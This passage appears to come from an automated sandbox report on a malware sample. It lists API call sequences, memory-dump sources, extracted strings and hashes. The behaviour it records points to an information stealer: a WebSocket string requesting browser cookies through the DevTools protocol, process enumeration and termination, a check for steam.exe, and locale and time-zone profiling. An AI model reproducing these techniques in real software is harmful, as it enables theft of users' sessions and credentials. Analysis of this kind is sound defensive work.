                           • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Xinvalid_argumentstd::_
                          • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                          • API String ID: 909987262-758292691
                          • Opcode ID: 8112e7c444b8cf2aee27c097680808b390b4b45d6d5a732a649071425be993f4
                          • Instruction ID: 2eefe9323e97de7eccaf1195220483f4b4dc699f095d9f4b915c97cc41a56ca3
                          • Opcode Fuzzy Hash: 8112e7c444b8cf2aee27c097680808b390b4b45d6d5a732a649071425be993f4
                          • Instruction Fuzzy Hash: 39A24871E0125DDBDB14DBA8C8807EDBBB6BF48300F1481AAD619A7341DB786E85CF91
                          APIs
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E23D4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E23F7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E2402
                          • lstrlen.KERNEL32(\*.*), ref: 007E240D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E242A
                          • lstrcat.KERNEL32(00000000,\*.*), ref: 007E2436
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E246A
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 007E2486
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                           • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                          • String ID: \*.*
                          • API String ID: 2567437900-1173974218
                          • Opcode ID: 25410a3a81dac2a17216732d414ac69de4408c0d8dde661de12ca0a3f767663f
                          • Instruction ID: 5529e3e644aed07a4f5e6e3034e216c8061c7fddfd2ef664181c82af94dca93e
                          • Opcode Fuzzy Hash: 25410a3a81dac2a17216732d414ac69de4408c0d8dde661de12ca0a3f767663f
                          • Instruction Fuzzy Hash: 99413031611259CBCB22EF65DD89B9E77B8EF65304F00A125BC59A7253CB789C038B91
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 007F46B9
                          • Process32First.KERNEL32(00000000,00000128), ref: 007F46C9
                          • Process32Next.KERNEL32(00000000,00000128), ref: 007F46DB
                          • StrCmpCA.SHLWAPI(?,?), ref: 007F46ED
                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007F4702
                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 007F4711
                          • CloseHandle.KERNEL32(00000000), ref: 007F4718
                          • Process32Next.KERNEL32(00000000,00000128), ref: 007F4726
                          • CloseHandle.KERNEL32(00000000), ref: 007F4731
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                           • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                          • String ID:
                          • API String ID: 3836391474-0
                          • Opcode ID: 39d1668e8233b340eed8ed000cf1a7996e10eb6b9446e0bef260272ffa7f1f1b
                          • Instruction ID: e1bec678cb43ed57d7ba1d98dead5b33d281b66c97a49ebb6238513c8d96aba4
                          • Opcode Fuzzy Hash: 39d1668e8233b340eed8ed000cf1a7996e10eb6b9446e0bef260272ffa7f1f1b
                          • Instruction Fuzzy Hash: DF01AD3160112DABE720ABA09C8CFFB377CAB49B51F004098FA49D1181EF7899838A75
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                           • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: )@_$+< $BR?~$Gw_r$IMO$q!.p$A}[$EV\$Fw
                          • API String ID: 0-3673220929
                          • Opcode ID: ba1bec5a60e1d683f979a26b2d6d9f071537cfd9ceb89fd26cc247dde319bb3d
                          • Instruction ID: 49cedb180cb07981c4cc32c114ee3b1f2e08bfaab5817959059d12c3ab78f416
                          • Opcode Fuzzy Hash: ba1bec5a60e1d683f979a26b2d6d9f071537cfd9ceb89fd26cc247dde319bb3d
                          • Instruction Fuzzy Hash: 04B2F6F360C2009FE704AE2DEC8567ABBE6EFD4720F16893DE6C4C7744E63558058696
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: .,v=$6,;$D@s=$N,8j$^0P$g7w$tS=~$t_$%o
                          • API String ID: 0-1453195210
                          • Opcode ID: 5c229e0b398a96cf1928b5c8e2849a717f43dbfca9506e732fee528a9624ee8d
                          • Instruction ID: c4faf9bdfb0e0386949b46f2020460cb7a0efeff7eb8ad095de202bfa1e99206
                          • Opcode Fuzzy Hash: 5c229e0b398a96cf1928b5c8e2849a717f43dbfca9506e732fee528a9624ee8d
                          • Instruction Fuzzy Hash: 30B208F390C204AFE3046E2DEC8567AFBE9EF94720F1A493DEAC4C3744E63558158696
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 007F4628
                          • Process32First.KERNEL32(00000000,00000128), ref: 007F4638
                          • Process32Next.KERNEL32(00000000,00000128), ref: 007F464A
                          • StrCmpCA.SHLWAPI(?,steam.exe), ref: 007F4660
                          • Process32Next.KERNEL32(00000000,00000128), ref: 007F4672
                          • CloseHandle.KERNEL32(00000000), ref: 007F467D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                          • String ID: steam.exe
                          • API String ID: 2284531361-2826358650
                          • Opcode ID: 5b7823ad52743ab3adecf7812714a60d1ac53d36ce79efd14fcf6220ccb14992
                          • Instruction ID: f6447835191400ba5a8c5068efb121b98f7cb8b74d445e3bce624dd17bbb35a6
                          • Opcode Fuzzy Hash: 5b7823ad52743ab3adecf7812714a60d1ac53d36ce79efd14fcf6220ccb14992
                          • Instruction Fuzzy Hash: F4014F7160212C9BE720DFA0AC49FEB77ACEF09750F0441D5FA48D1141EF789A968AE5
                          APIs
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E4B51
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E4B74
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E4B7F
                          • lstrlen.KERNEL32(00804CA8), ref: 007E4B8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E4BA7
                          • lstrcat.KERNEL32(00000000,00804CA8), ref: 007E4BB3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E4BDE
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 007E4BFA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                          • String ID:
                          • API String ID: 2567437900-0
                          • Opcode ID: 284d25f4ed2675a0f542f863aef46acf692b260e2479c75aaed0e13760d51ef5
                          • Instruction ID: ebce36a710f7b377654a9728c75301b40a905dc9037dcbedfeb3e92f0a39252d
                          • Opcode Fuzzy Hash: 284d25f4ed2675a0f542f863aef46acf692b260e2479c75aaed0e13760d51ef5
                          • Instruction Fuzzy Hash: 7C310C71621569DBC722EF65EC89B9E77B9EFA4300F005125F815A7362CB38EC038B90
                          APIs
                            • Part of subcall function 007F71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 007F71FE
                          • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 007F2D9B
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 007F2DAD
                          • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 007F2DBA
                          • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 007F2DEC
                          • LocalFree.KERNEL32(00000000), ref: 007F2FCA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                          • String ID: /
                          • API String ID: 3090951853-4001269591
                          • Opcode ID: 196ce08b6c2ed6a25acc313d92ab98887466908b2c3344ddf7dd9627f4b76006
                          • Instruction ID: ff824ba220c4c1ef32269350eaae1ff3cadf8db1fce4b47b076eda12b847ed1a
                          • Opcode Fuzzy Hash: 196ce08b6c2ed6a25acc313d92ab98887466908b2c3344ddf7dd9627f4b76006
                          • Instruction Fuzzy Hash: 7CB1E571A10209CFD755CF58C948BAAB7F1FB44325F29C1A9D5089B3A2D77A9D83CB80
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: R_y$ x%$%zm$'0_v$9P|$?&[?$FAO
                          • API String ID: 0-3760677280
                          • Opcode ID: c38453df3ea84adc476ed4e7c39c19663c98d47900d935c547ce654eab4a3380
                          • Instruction ID: 51303d31613612741fa58cf17a618e2e01fcd283925369fe8eeda1bd93d28126
                          • Opcode Fuzzy Hash: c38453df3ea84adc476ed4e7c39c19663c98d47900d935c547ce654eab4a3380
                          • Instruction Fuzzy Hash: 48B218F3A0C6009FE7046E2DEC8567ABBE9EFD8720F1A453DE6C4C3744EA3558058696
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: -u?$;<Uv$OwW$p+_{$p+_{$We
                          • API String ID: 0-3798403636
                          • Opcode ID: 7546a7ca975ebd978af305633bb47bdaf67044e96946666d72c857374bcf7f3f
                          • Instruction ID: d5627d3fe88a6a786fc162aa47ceb7770eedc07cadd4c5978ffad4698440346c
                          • Opcode Fuzzy Hash: 7546a7ca975ebd978af305633bb47bdaf67044e96946666d72c857374bcf7f3f
                          • Instruction Fuzzy Hash: 09B206F36082049FE304AE2DEC8577ABBE9EF94720F16853DE6C4C7744EA3598058697
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 007F2C42
                          • RtlAllocateHeap.NTDLL(00000000), ref: 007F2C49
                          • GetTimeZoneInformation.KERNEL32(?), ref: 007F2C58
                          • wsprintfA.USER32 ref: 007F2C83
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                          • String ID: wwww
                          • API String ID: 3317088062-671953474
                          • Opcode ID: b4c701853179f29713032c24d0d6b271416b2a182c38eb7ce63346bf1caa7c91
                          • Instruction ID: afbc9fe926b968b84fdd22876ea48f46ee5523647160a6a372800b06c84ee75c
                          • Opcode Fuzzy Hash: b4c701853179f29713032c24d0d6b271416b2a182c38eb7ce63346bf1caa7c91
                          • Instruction Fuzzy Hash: 60012BB1A40608ABDB18CF98DC09F6FB76DEB84721F004329F915D77C0D77419018AE1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
